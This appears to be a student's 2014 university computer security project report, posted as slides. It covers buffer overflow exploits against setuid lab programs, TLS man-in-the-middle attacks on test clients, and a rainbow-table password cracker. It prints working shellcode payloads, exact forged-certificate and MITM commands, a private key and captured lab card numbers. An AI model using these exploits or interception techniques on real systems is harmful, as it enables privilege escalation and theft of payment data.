Format String Exploitation
byUTD Computer Security Group
 
PPT
E-Commerce Security - Application attacks - Server Attacks
byphanleson
 
PPTX
Linux binary analysis and exploitation
byDharmalingam Ganesan
 
PPTX
Smashing The Stack
byAbhishek BV
 
PDF
Buffer overflow tutorial
byhughpearse
 
PDF
Simplest-Ownage-Human-Observed… - Routers
byLogicaltrust pl
 
PPTX
Tranning-2
byAli Hussain
 
PPTX
03 - Refresher on buffer overflow in the old days
byAlexandre Moneger
 
ODP
Exploiting buffer overflows
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PPT
Automate Payload Generation for a Given Binary and Perform Attack
byAbhishek BV
 
PDF
TDOH x 台科 pwn課程
byWeber Tsai
 
PDF
Aide 2014 - Fundamentals of Linux Privilege Escalation
bynullthreat
 
PDF
Meterpreter in Metasploit User Guide
byKhairi Aiman
 
Unix executable buffer overflow
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
byYury Chemerkin
 
Offensive cyber security: Smashing the stack with Python
byMalachi Jones
 
Dive into exploit development
byPayampardaz
 
Exploitation Crash Course
byUTD Computer Security Group
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
byLyon Yang
 
antoanthongtin_Lesson 3- Software Security (1).pptx
by23162024
 
Format String Exploitation
byUTD Computer Security Group
 
E-Commerce Security - Application attacks - Server Attacks
byphanleson
 
Linux binary analysis and exploitation
byDharmalingam Ganesan
 
Smashing The Stack
byAbhishek BV
 
Buffer overflow tutorial
byhughpearse
 
Simplest-Ownage-Human-Observed… - Routers
byLogicaltrust pl
 
Tranning-2
byAli Hussain
 
03 - Refresher on buffer overflow in the old days
byAlexandre Moneger
 
Exploiting buffer overflows
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Automate Payload Generation for a Given Binary and Perform Attack
byAbhishek BV
 
TDOH x 台科 pwn課程
byWeber Tsai
 
Aide 2014 - Fundamentals of Linux Privilege Escalation
bynullthreat
 
Meterpreter in Metasploit User Guide
byKhairi Aiman
 

Computer Security

  • 1.
    Buffer overflows knowledgerequirements : C/C++ Assembly program memory allocation Linux permissions. There are three users on the same Linux machine with a secret.txt file each one. Each of the users (superuser, hyperuser, masteruser) have an executable on their directory which can be executed by all the other users. When executing the program users will have the owners permissions and not the permissions of the user executing it. The goal we trying to succeed is to to create a Shell running from the executables with the victim's privileges by overwriting a usefull address/bit. Superuser: program: convert.c without any protection against buffer overflows Hyperuser: program: arpsender.c uses a canary to protect against buffer overflows. Masteruser: program: zoo.cpp must be exploited using the VPTR.
  • 2.
    Kotsomitopoulos Aristotelis Project #1ΥΣ13 ΕΑΡΙΝΟ 2014 (computer system security) SuperUser Here we just try to place in our RET address a value inside our buffers first NOPS, so our ip will continue until it finds our SHELLCODE! our buffer will look like [NOP NOP NOP NOP...SHELLCODE...ADDR ADDR ADDR ADDRR] for exaple we can use 820 size buffer to be sure we overwrite the RET value with ADDR we can use Exploit3.c from Alef with value 820 = 720(our date buffer ) + 100 (is a good choice)so we create easily the above buffer and we can use : /home/superuser$ ./convert a $EGG (our ENVIROMENTAL var)(code at last page) to open our shell... an alternative way is to work like the HYPERUSER and create a bash script that simply modify the RET value with ADDR at once(almost the same with alef) using command : "info locals" we can find our date buffer start address and we can add a bit offset to overwrite our address, and with "info f" we can check when our RET value is overwrited with the NOPS address or the start of our shellcode and we are DONE!! --------------------------------------- supersecret.txt --------------------------------------- $ cat supersecret.txt One is is three in any people a of is in called In example read a is the simply into parts to How is each the itself? possible the that about is a interesting discussed later orutnFolvthlleroj SERIAL:1399762801- c9a58cf2a26af87ec9de1745f2eaed5f298dae7581b6dcd7d77d1eaa33104fad7031c4f9814bdcc3e5 72b8e0476c1e1aa0c1eb3523756beeaa1b4ee0d67d1c72
  • 3.
    HyperUser Firstly i hackedhyperuser using the follow script : With the above instructions i succeed to jump to my RET address without touching the canary by using a vulnerable pointer.
  • 4.
    Hyperscript.sh (original codeat last page) //chmod +x Hyperscript.sh #!/bin/bash `perl -e 'printf #buffer address before shell code on NOPS "x1exa0x04x08" . #our 5th letter we wanna have 140 ascii value chr(140) . #we add 60 x NOPS "x90" x 60 . #we add Shell Code "xebx1fx5ex89x76x08x31xc0x88x46x07 x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56 x0cxcdx80x31xdbx89xd8x40xcdx80 xe8xdcxffxffxff/bin/sh" #we add 10 x NOPS "x90" x 10 . #we add RET address to our vulnerable pointer "AAAABAAACAAAAADAAAAx8cxf6xffxbf";' > output.txt` --------------------------------------- HYPERSECRET.txt --------------------------------------- $ cat hypersecret.txt interesting how possible people, general number to secret text. something cryptography secret this that right simple presented text divided three and three much leaked share secret Is to secret no the leaked share? questions in on! nalisr inengeect SERIAL:1400202302- bc1977e5b8b6526c4065fc92591f912e95075079bee1f1c6ae6d7b4b40390b9ece61342f212c1f5cf 87cb0be4df16698c49f51191d7f417e067bf90db0b7f536
  • 5.
    MasterUser we overwrite theVPTR at the end of our first buffer[256] and we need to call ("-s") in order for the virtual function to be called.. we must create a "virtual Vtable" in our buffer to confuse our program and for example if our pointer try to call an overload operator or a print function from vtable it will load our shellcode... so our form is : using “info f” with break 13 we can find our THIS address or our class VTABLE starts at 0x804a008 so we want to replace vptr with 0x804a008+4 so it will point there and inside the 0x804a008+4 we will place our nops or shellcode address. Lets have a better look:
  • 6.
    so now ourSELLCODE can be Executed : std10048@sbox:/home/masteruser$ ./zoo -c `perl -e 'printf "x18xa0x04x08x18xa0x04x08x18xa0x04x08x90x90x90x90xeb x1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x8 dx56x0cxcdx80x31xdbx89xd8x40xcdx80 xe8xdcxffxffxff/bin/sh" . "A" x 195 . "x0cxa0x04x08" x 8 ;'` -s we could avoid placing 8x addresses at the end if we have counted byte by byte exactly the Vptr location. --------------------------------------- MASTERSECRET.txt --------------------------------------- $ cat mastersecret.txt question it for or for of share piece This that is sharing. little you now solution where is vertically different distributed parties. information from about passage it divide so information secret by These will class Cgtao!sog haofpone SERIAL:1400759702- 8f9a1fe300998d1d45bdaf99740699fcc68786fb04d9c83b8056d6839f3aed2c66446bb9d17c5c1cf c6b3c4da35af78504713ab70b4c5082eae2f4ab44c3c7b2
  • 7.
    Final TEXT SUPER+HYPER+MASTER #include<iostream> #include<string> #include<fstream> usingnamespace std; int main(void){ ifstream super,hyper,master; super.open("superuser.txt"); hyper.open("hyperuser.txt"); master.open("masteruser.txt"); string Sword[37],Hword[38],Mword[37]; //wc -w filename.txt int i=0; while(super >> Sword[i]){ i++; } i = 0; while(hyper >> Hword[i]){ i++; } i = 0; while(master >> Mword[i]){ i++; } for (i = 0;i<37; i++){ cout<<Sword[i]<<" "<<Hword[i]<<" "<<Mword[i]<<" "; } cout<<Hword[37]<<endl; return 0; } So Our Final Text: One interesting question is how it is possible for three people, or in general for any number of people to share a secret piece of text. This is something that in cryptography is called secret sharing. In this little example that you read right now a simple solution is presented where the text is simply divided vertically into three different parts and distributed to three parties. How much information is leaked from each share about the secret passage itself? Is it possible to divide the secret so that no information about the secret is leaked by a share? These interesting questions will discussed in class later on! Cgtao!sog orutnFolvthlleroj nalisr haofpone inengeect
  • 8.
  • 9.
    Man-in-the-middle attack toTLS (RFC 52461) Protocol An online shop webshop.com in the address https://sbox.di.uoa.gr/ and 6 different clients that they try to connect to the workshop via TLS. The webshop has a certificate singed up by the certification authority Compsec CA All clients have access in the self-singed certificate of the Compsec CA. With each ssh connection in the sbox.di.uoa.gr the 6 clients will try to connect with the webshop.(one each time) Display Message: timestamp: XXXXXXXXXX forwarding webshop client requests to port YYYYY clients because of a misconfiguration will try to connect to YYYY instead of (443) port of the webshop.So now we have the ability for the man-in-the-midle-attack. Difficulty 1. Mr. Blonde. X 2. Mr. Blue. XX 3. Mr. Brown. XX 4. Mr. Orange. XX 5. Mr. Pink. XXXX 6. Mr. White. XXXXX
  • 10.
    Kotsomitopoulos Aristotelis Project #2ΥΣ13 ΕΑΡΙΝΟ 2014 (computer system security) Firstly Lets Create a certification authority(CA) my folder is “std10048@sbox:~/myProject2$” we execute the following: cp /etc/ssl/openssl.cnf . (we modify the ./demoCA to ./) mkdir certs csr newcerts private echo 00 > serial echo 00 > crlnumber touch index.txt openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt -days 3650 -config ./openssl.cnf openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config ./openssl.cnf with are my informations for CA so now we have our CA and our folders created they look something like this :
  • 11.
    Now that wehave our CA created lets generate a certificate using our CA Lets hack firstly Mr.Blond ! He is a realy idiot client he checks almost nothing so : openssl genrsa 1024 > private/MrBlond.key && openssl req -new -key private/MrBlond.key -out csr/MrBlond.csr -config ./openssl.cnf so now lets continue with this command to complete our generation and then we dont even need to verify with CA for that client. openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile private/cakey.key -days 365 -out certs/MrBlond.crt -infiles csr/MrBlond.csr
  • 12.
    so now wehave our .crt and our .key std10048@sbox:~/myProject2/certs$ cat MrBlond.crt Certificate: Data: Version: 3 (0x2) Serial Number: 0 (0x0) Signature Algorithm: sha1WithRSAEncryption Issuer: C=GR, ST=ATTICA, L=Athens, O=University of Athens, OU=Department of Informatics and Telecommunications, CN=SBOX CA/emailAddress=csec.di@gmail.com Validity Not Before: Jun 7 13:02:45 2014 GMT Not After : Jun 7 13:02:45 2015 GMT Subject: C=GR, ST=ATTICA, L=Athens, O=Uoa, OU=DiT, CN=idiot_Client/emailAddress=idiot_client@gmail.com Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (1024 bit) Modulus: 00:be:c7:07:e7:80:9a:ab:12:78:04:97:04:5e:2a: 6d:31:7b:29:1a:3e:78:10:f3:cb:b4:ed:f1:f9:87: b3:72:57:01:ae:1f:2f:33:95:ba:cd:64:b5:20:37: 0d:cb:c8:df:eb:ff:e9:ca:47:1d:db:b6:2c:bb:35: 4f:66:2f:6a:c9:c0:2b:f1:12:fc:f1:58:72:03:b1: 8b:56:bf:44:14:af:ed:a6:0b:9c:92:2d:3b:e3:59: 9e:6d:32:cf:e4:cd:06:ff:af:dc:f2:d0:1b:1e:98: b6:73:07:37:c3:a6:38:47:b1:7d:d3:d8:e4:f0:b5: 3b:4a:7f:fb:8e:af:7a:73:95 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Basic Constraints: CA:FALSE Netscape Comment: OpenSSL Generated Certificate X509v3 Subject Key Identifier:
  • 13.
    7E:B8:D8:FD:79:0C:F0:F2:DC:CE:9D:61:15:5D:91:13:4B:E2:F1:83 X509v3 Authority KeyIdentifier: keyid:41:DF:39:D0:2D:BB:25:0D:70:38:3B:21:94:B8:C7:39:ED:05:AF:E1 Signature Algorithm: sha1WithRSAEncryption 03:19:8f:60:83:79:db:7a:99:c1:75:14:49:a7:fb:98:2e:c0: 23:24:39:04:43:6a:11:1d:b3:7b:b5:fe:36:ed:0e:bd:19:83: 8d:e7:43:e6:e4:c7:f1:f3:b6:28:1d:50:4f:82:d6:ac:32:95: a6:1b:b1:52:3e:09:2c:c6:1a:86:55:1a:20:07:af:c4:60:f0: 2b:ef:59:b1:81:c5:66:8a:52:62:f1:e9:94:9b:ee:b6:76:fb: 98:ff:a9:94:8c:e7:fe:31:0c:06:7b:2e:3b:d4:d2:36:19:df: e0:af:09:51:86:82:18:c6:57:da:e6:15:68:b0:79:0a:52:bd: 34:f6:1c:46:88:80:da:8a:2b:6f:33:4d:38:16:89:b9:ad:83: ee:11:90:02:13:ce:e0:68:83:32:17:a4:70:82:5a:57:f9:64: c3:74:2f:59:95:33:ce:7e:8c:81:b9:e7:b1:5e:dd:0e:b4:59: 2b:e5:b3:ed:38:40:7f:74:40:8f:fc:db:a4:b5:76:e0:74:e8: 1f:ba:f5:f1:ba:09:96:6d:90:0e:77:33:a3:27:0d:fb:c1:a6: 1c:53:51:71:3a:83:5c:ba:2e:12:67:40:5b:7e:b9:fb:91:97: e8:ef:ff:8a:70:94:02:69:d7:39:42:4c:a3:0a:c0:b3:3d:42: 44:f2:8e:65 -----BEGIN CERTIFICATE----- MIIDujCCAqKgAwIBAgIBADANBgkqhkiG9w0BAQUFADCBvTELMAkGA1UEBhMCR1Ix DzANBgNVBAgMBkFUVElDQTEPMA0GA1UEBwwGQXRoZW5zMR0wGwYDVQQKDBRVbml2 ZXJzaXR5IG9mIEF0aGVuczE5MDcGA1UECwwwRGVwYXJ0bWVudCBvZiBJbmZvcm1h dGljcyBhbmQgVGVsZWNvbW11bmljYXRpb25zMRAwDgYDVQQDDAdTQk9YIENBMSAw HgYJKoZIhvcNAQkBFhFjc2VjLmRpQGdtYWlsLmNvbTAeFw0xNDA2MDcxMzAyNDVa Fw0xNTA2MDcxMzAyNDVaMIGJMQswCQYDVQQGEwJHUjEPMA0GA1UECAwGQVRUSUNB MQ8wDQYDVQQHDAZBdGhlbnMxDDAKBgNVBAoMA1VvYTEMMAoGA1UECwwDRGlUMRUw EwYDVQQDDAxpZGlvdF9DbGllbnQxJTAjBgkqhkiG9w0BCQEWFmlkaW90X2NsaWVu dEBnbWFpbC5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAL7HB+eAmqsS eASXBF4qbTF7KRo+eBDzy7Tt8fmHs3JXAa4fLzOVus1ktSA3DcvI3+v/6cpHHdu2 LLs1T2YvasnAK/ES/PFYcgOxi1a/RBSv7aYLnJItO+NZnm0yz+TNBv+v3PLQGx6Y tnMHN8OmOEexfdPY5PC1O0p/+46venOVAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJ YIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1Ud DgQWBBR+uNj9eQzw8tzOnWEVXZETS+LxgzAfBgNVHSMEGDAWgBRB3znQLbslDXA4 OyGUuMc57QWv4TANBgkqhkiG9w0BAQUFAAOCAQEAAxmPYIN523qZwXUUSaf7mC7A IyQ5BENqER2ze7X+Nu0OvRmDjedD5uTH8fO2KB1QT4LWrDKVphuxUj4JLMYahlUa IAevxGDwK+9ZsYHFZopSYvHplJvutnb7mP+plIzn/jEMBnsuO9TSNhnf4K8JUYaC GMZX2uYVaLB5ClK9NPYcRoiA2oorbzNNOBaJua2D7hGQAhPO4GiDMhekcIJaV/lk w3QvWZUzzn6MgbnnsV7dDrRZK+Wz7ThAf3RAj/zbpLV24HToH7r18boJlm2QDncz oycN+8GmHFNRcTqDXLouEmdAW365+5GX6O//inCUAmnXOUJMowrAsz1CRPKOZQ== -----END CERTIFICATE----- std10048@sbox:~/myProject2/private$ cat MrBlond.key -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+xwfngJqrEngElwReKm0xeykaPngQ88u07fH5h7NyVwGuHy8z lbrNZLUgNw3LyN/r/+nKRx3btiy7NU9mL2rJwCvxEvzxWHIDsYtWv0QUr+2mC5yS LTvjWZ5tMs/kzQb/r9zy0BsemLZzBzfDpjhHsX3T2OTwtTtKf/uOr3pzlQIDAQAB AoGBAIOrepkc+aL4rDz+vdUAEz0Dc+rZEqUgnofRciB2uDNCObajb0B7JuJ7j0cc uDjd+y43AnTJgKITqevLb3FnaJuDU3P7acg7pBqwQONdZBUHoos59uNr9T7IFRe1 sjddN1c3yyXRVoHXC1IjuwcDCoYTjB5DEkRuwXflP3fpFYBBAkEA9pS2SndYaIV4 +Glo6TJZpljY8xMXHEZXSCQ+vdsGYiP+pO84ApimoHqKlgly3vO4pREdAj56jgM/ 1PmXuAhF5wJBAMYQn3y9W99IVEZVWBFAFM1RrvXu07QuchgQ3eRfvaPDSNulNVgU hDVf/NKLQU3qOTaFPpXmcROI9eSPKBb5UyMCQQC3oYwX7MUUIcIzDR0p/WsyLJx0 eVUOo3vAp+1pqkEYuUGcRuJpXJFKlbe7gJHhY5Owqgv2bd0LAXR6AN5yGQclAkEA p3iqwhiCtDs+NvI2su9SJ4FnxL8Z9oJHKp4oYM+rU+rtkfsRLda7Kz5sUcI5h54C nlzv3GOrPO9Tqtx482QBrQJAWX1o/vNW+LPvQfMDPEqWozGV3TeMVtKCt52qoPUu 0po9JXx2WZEmjObrCyEgau/GxuUN5UeAqG+w7grgzTk85A== -----END RSA PRIVATE KEY-----
  • 14.
    Now we canrun twestedeve like that : command: twistedeve -c certs/MrBlond.crt -k private/MrBlond.key -a localhost:10048 -t localhost:443 -b localhost:46619 so we can be the man in the middle. After commands execution we open new terminal we login we find the correct port (46619 this time) for our connection and our Mr.BLond Client have been hacked : So this is First Client Credid card and timestamp 'cc=4916105057678726&timestamp=1402146284' Now lets hack Mr.Blue ( i named it brown ) he is more `clever` than Mr.Blond but he has another vulnerability he checks company name so with our previous CA we create a new certificate but this time we insert in common name field “sbox.di.uoa.gr “ so:
  • 15.
    so we simplyagain run twistedeve and : twistedeve -c certs/brown.crt -k private/brown.key -a localhost:10048 -t localhost:443 -b localhost:48211 so we can observe Mr.Blue credit card and timestamp : 'cc=4556270584159924&timestamp=1402148722' now lets hack Mr.Brown we know that webshop and mysite have both the same Cartification Authority (sbox CA) so Mr.Brown Checks only if our .crt and our .key are verified by SBOX CA and nothing more so: SBOX CA mysite.com webshop.com we use twestedeve with /var/project2/mysite.com.crt and /var/project2/mysite.com.key and now we can get Mr.Brown credit card !
  • 16.
    Command : twistedeve -c/var/project2/mysite.com.crt -k /var/project2/mysite.com.key -a localhost:10048 -t localhost:443 -b localhost:46749 So here is credit & timestamp for Mr.Brown 'cc=4539346713524865&timestamp=1402150208' Mr.Orange now : we will use certification chain we now know how to create CA generate certifications and sign with them.. so now lets try something different! In our new folder after those commands : cp /etc/ssl/openssl.cnf . mkdir certs csr newcerts private echo 00 > serial echo 00 > crlnumber touch index.txt instead of using : openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt -days 3650 -config ./openssl.cnf
  • 17.
    the above commandwill create a brand new cakey.key and cacert.crt file we will use our existing ones from mysite.com , so we navigate to /var/project2/ and we copy our mysite.com.key and our mysite.com.crt : now lets create the two files in order to use correctly our next command we create cacert.crt and /private/cakey.key and we paste our coped contents from mystie now we can use the generation command with our custom files! openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config ./openssl.cnf now we will generate our certificate using the above CA : openssl genrsa 1024 > private/sbox.di.uoa.gr.key && openssl req -new -key private/sbox.di.uoa.gr.key -out csr/sbox.di.uoa.gr.csr -config ./openssl.cnf openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile private/cakey.key -days 365 -out certs/sbox.di.uoa.gr.crt -infiles csr/sbox.di.uoa.gr.csr
  • 18.
    so now letscreate our certification chain we will paste in our /certs/sbbox.di.uoa.gr.crt our mysite.com pure certificate so there will be our expected confusuin from our client and our “man in the middle” will purchase victims credid card number ------BEGIN CERTIFICATE----- ..... our above created certificate code ..... ------END CERTIFICATE------ ------BEGIN CERTIFICATE----- ..... mtsite.com certificate code ..... ------END CERTIFICATE------
  • 19.
    so our filewill look something like this: our certificate copyed from mysite.com.crt now we can start twistedeve and try our .crt and .key lets see : twistedeve -c certs/sbox.di.uoa.gr.crt -k private/sbox.di.uoa.gr.key -a localhost:10048 -t localhost:443 -b localhost:41866 our man in the middle listen at port 41866 we login and realise that Mr.Orange has been hacked
  • 20.
    credit card successfulattack! So our credit card number & timestamp is : 'c=4716666995541278&timestamp=1402231087' For Mr.Pink now. Lets try to use twistedeve with a filter and without using certificate: twistedeve -c -f /var/project2/filters/tlsinfo.py -a localhost:10048 -t localhost:443 -b localhost:41866 so we can see what client and server protocols etc supports. We can see that client 5 Mr.Pink uses TLS_DH_anon_WITH_AES.. so here is the problem we can create an openssl custom server that will listen in a port “4444” then we will redirect with twistedeve our users to that port and with our openssl server would be set with no certificate is used option. This restricts the cipher suites available to the anonymous ones (currently just anonymous DH).
  • 21.
    Here we cansee that we use that DH_anon! So now lets create our openssl server : openssl s_server -accept 44444 -nocert -cipher DH (cipher suites using DH including anonymous DH) so now we can run twistedeve like that : twistedeve -c -a localhost:10048 -t localhost:44444 -b localhost:43566 (clients port) so lets run our clients at port(43566) with our server and twistedeve opened(we need three terminals) so ALL clients will fail except Mr.Pink so we will be able to steal his credit card!
  • 22.
    Mr.Pink request sent everythingelse failed! Credit card and timestamp So Mr.Pinks Credit Card & Timestamp is : 4486750853453368&timestamp=1402274478 Mr.White has a complete TLS protection so he needs a more powerful hacker to be hacked!!!
  • 23.
    Rainbow Tables Kotsomitopoulos Aristotelis Project#3 ΥΣ13 ΕΑΡΙΝΟ 2014 (Computer System Security) I want to hack a password of 6 chars, those chars must have been created from the given alphabet. Alphabet:(64) "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@" so a password example can be “AriS1@”. In order to hack this password i will use rainbow tables! passwords are stored as the output of a hash function. Hashes are one-way operations. Even if an attacker gained access to the hashed version of your password, it's not possible to reconstitute the password from the hash value alone but its possible to attack the hashed value of your password using rainbow tables. We have 64^6 different password = 68.719.476.736 = 69 billion different passes First of all i create for example 1.000.000 different passwords 6 char long and this will be the start of my chain something like : !!!7B0 !!!80! QBLfQU VM7Ucl eORyLL lXO8rC t9p48R 8Qi!cm 8QjgAU I3m2Zn ..... ... now for every plaintext of the above we will create a chain plaintext -> hash = blake(plaintext) -> new_plaintext = my_reduction_function(hash) -> hash = blake(new_plaintext) -> repeat.....->......->.... in my program i create a chain 10.000 long so for every plaintext i use
  • 24.
    blake+my_reduction_function (10000 times). Finallyi will have almost 1.000.000 x 10000 = 10 billion different values (without collisions) so if we had 1 password given i have 1/7 possibilities to hack it but now i have more than 15 password given so that size is enough with a bit of luck... to generate that size of rainbow table took more than 16 hours... in my ophinion the best size for that problem would be 5 million x 10.000 but that need alot lot lot of time to be generated even with threads and multicore processor! So after that huge generating i place the results in a .txt file an my search-find password program will use that table to hack the password.. the file will look like this : output_1mX10000.txt !!!7B0 77240e13ebff7ea020e62d90975cd17963fa818bec3f55836e2fcd4780ea48d9 (1) !!!80! f55715be2179b0fb9d3f83bdb39fed8374afcbaea9213e4f2001a0b8734a0765(2) !!!80Z 3410c7d80d27f5bd489f5dd5c0533043c6ce17c363f8ab7acf7b91511df5ac96(3) !!!YI2 1657ca495a203164edc363700c86adbe54374edc05cf474e70030a842f76da68(4) !!!oC@ 0f1e9b44a2441c46f0c525f5c22777c4f009ec1b0f5776604b42639cf230648f(5) !!!uZW d2953ba6e7074c76c0461eb8ec7d7c36bcb434001284abba8d0c92d6bd892f7a(6) !!07fO 5b9ef9c41b5444476e2c66e050c795031185f42bfc40bf8f174f1e0e3bb8f581(7) !!0JB0 7a73cb5357eb35ecfc82ebc351112824c54bdaa70603fe5262e21f22fd13cd60(8) !!0R7U 6ffdb183126ca9e70b659ea45f4dcb0ca78c7136f72fa733bb960d315eca19a0(9) !!0XJ6 85b0c65a867e08b6ae7d7d65ddae3c6e4def38ad805cbb96b75a49884928852b(10) !!0fNM 790fe297f6ca448cdd97e083176ad3e492258ea2167f9048119da9dcbfaa12d9(11) !!0kyY 5498173ef57774579a8095eb6d32a2bee8cac4bf9153ddda011ab33d600d6257(12) !!0rik 73288f5ab7e7fc5b1d2a387dacc6401b24c422494d5d4f6ad280e4d046b83327(13) !!1wh0 98f12f574918ff51e92369c38d9369d474b2f2bf0291d79e6bb3be71ed7abd2d(14) ....... ............... ........................ ............................. zzxEpx f9042996c416d9f32395b0bb967aca9df277f4e8dcd14794bc60a820aa5d286f(999988) zzxMxc c1409a47dab4ce96a013a7033c868d56888a748cf670c28b86c1413c6801fd92(999989) zzxpFE e6dba8c5b25946070e7f680e2255a08aba46ca92fdf2e818f245ad01fb8fba03(999990) zzxvEY f028262e61fee77d2104ef928d195d6b401fdb50522bdacad088ab0df197a756(999991) zzyw9@ 0861fc88106fffb2e9731b5a6b67b5ffc891d19d2b8b8334c57a97ce50bf3e0a(999992) zzz4sv bf6aef7de87249ecaee1bb8c83b1025d3c238226f1ce47999b1dbc24fd2bab6e(999993) zzzAuV dd6e7cfa2031148cf1c22c1756bd7f5a0cb8c96e581e87cf1fb3dada8963cfee(999994) zzzGGs 8872e669d2284297bbfe4494ced287de58ff0b60c66d3a1b46a8b7657cc1188f(999995) zzzRqC d5859daaf422a4c73dafe382292c5e1c9dba17361d9176663658a8a48b9e3a08(999996) zzzTe5 946a862717e78677d6eb96b25f952cdee0a91de870789b129abc1d8e4ff15eca(999997) zzzZ67 9750c53137b46208040c93b08cc7ed1454a4fe0e1583511153291bcd0e40b393(999998) zzzgB3 4a5af0f0a7c1b61137bcd1143d447a05c8ada3d63eade369286e807f0b9c554a(999999) zzzyqE a36a2403b3adb9c50094866613fd2e956f500868cbc2a6ee9a99ba8ec8c41b79(1000000) in order to reduce collisions i tried a lot of different reduction functions with a lot of tests , in my final function in order to produce 6 char long random passwords from a given 64 char long hash : i map every char from the hash(16 different chars 0123456789abcdef) with my alphabet “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@” i add the first 10 hash chars (ex. 0Fa2.. = 0+15+10+2..) and then i make a XOR with the next 10 in that way i produce a number than number MOD 64 give me a number inside my alphabet for example 63 is '@'! and for the 6th char i use the last 4 characters + 6 first in that way i produce a deterministic random string ( plaintext ) for my chain! string plaintext_from_hash3(string my_hash){
  • 25.
    string charset ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@"; string result; int sum = 0; int counter=0; /* this is for our last XOR 50-60 with the last 4 chars + the 6 firsts! */ int last_digits = my_hash[60]+my_hash[61]+my_hash[62]+my_hash[63]; for(int i=0; i<6; i++) last_digits += my_hash[i]; /* this is for our 5 XOR */ int for_XOR[6]; for(int i=0; i<6; i++){ sum=0; for(int j=0; j<10; j++){ if(my_hash[counter] == '0') sum += 0; else if(my_hash[counter] == '1') sum += 1; else if(my_hash[counter] == '2') sum += 2; else if(my_hash[counter] == '3') sum += 3; else if(my_hash[counter] == '4') sum += 4; else if(my_hash[counter] == '5') sum += 5; else if(my_hash[counter] == '6') sum += 6; else if(my_hash[counter] == '7') sum += 7; else if(my_hash[counter] == '8') sum += 8; else if(my_hash[counter] == '9') sum += 9; else if(my_hash[counter] == 'a') sum += 10; else if(my_hash[counter] == 'b') sum += 11; else if(my_hash[counter] == 'c') sum += 12; else if(my_hash[counter] == 'd') sum += 13; else if(my_hash[counter] == 'e') sum += 14; else if(my_hash[counter] == 'f') sum += 15; counter++; } for_XOR[i] = sum; } int res; res = for_XOR[0] ^ for_XOR[1]; //1st XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[1] ^ for_XOR[2]; //2nd XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[2] ^ for_XOR[3]; //3rd XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[3] ^ for_XOR[4]; //4th XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[4] ^ for_XOR[5]; //5th XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[5] ^ last_digits; //6th XOR if(res<0) res=-res; result+=charset[res%64]; return result; } Lets assume for example after we use dbus-monitor in sbox.di.uoa.gr we get the
  • 26.
    following hash : 9b465fce3fd32aa5531f801d4c63f31380adc84c62f0d170aaf535619b85a928 sowe will search if the above hash is in our table IF WE FIND IT we will use the chains started plaintext to obtain the password we will use blake->reduction->blake->reduction.. until we find our first hash in our case it would be the last one so the plaintext that produced this hash would be our hacked password !.. if we dont match the above hash with our rainbow table hashes then we will use reduction function to our hash then blake and then we will try to find it again if we find it then we will search again the correct chain until we find the FIRST hash(not the new one)..if we fail again we will continue hashing and reducing our given hash until we found a chain match in rainbow table.. if we use in my situation 10.000 loops and dont find a match then we failed and that password cant be hacks with my table..now if we find a match but after expanding the appropriate rainbow table 10.000 and we dont find our FIRST hash then we dont stop we continue exapning and searching for another chain MATCH!! if we check every possible chain and the FIRST isnt there then the password cannot be hacked with that rainbow table.. if we had used a bigger one it would be almost 100% possibility our password would be hacked! After we hack the password we use nc localhost 4433 and we enter the password! We have only 10 seconds to copy hash + paste it to our program + use the above command + paste the result so its a bit hard.. my search function can make an average of 7 second to find the result so its kinda HARD!!! The exercise was developed using C++ in windows (CodeBlocks) and tested in linux ubuntu all my .cpp and .h would are included in my ZIP! My rainbow table has size 100MB so i cant include it! So here is an example of hacking a password from hash! with my search program.. but again my rainbow table is 10 billion without collisions so its a bit small.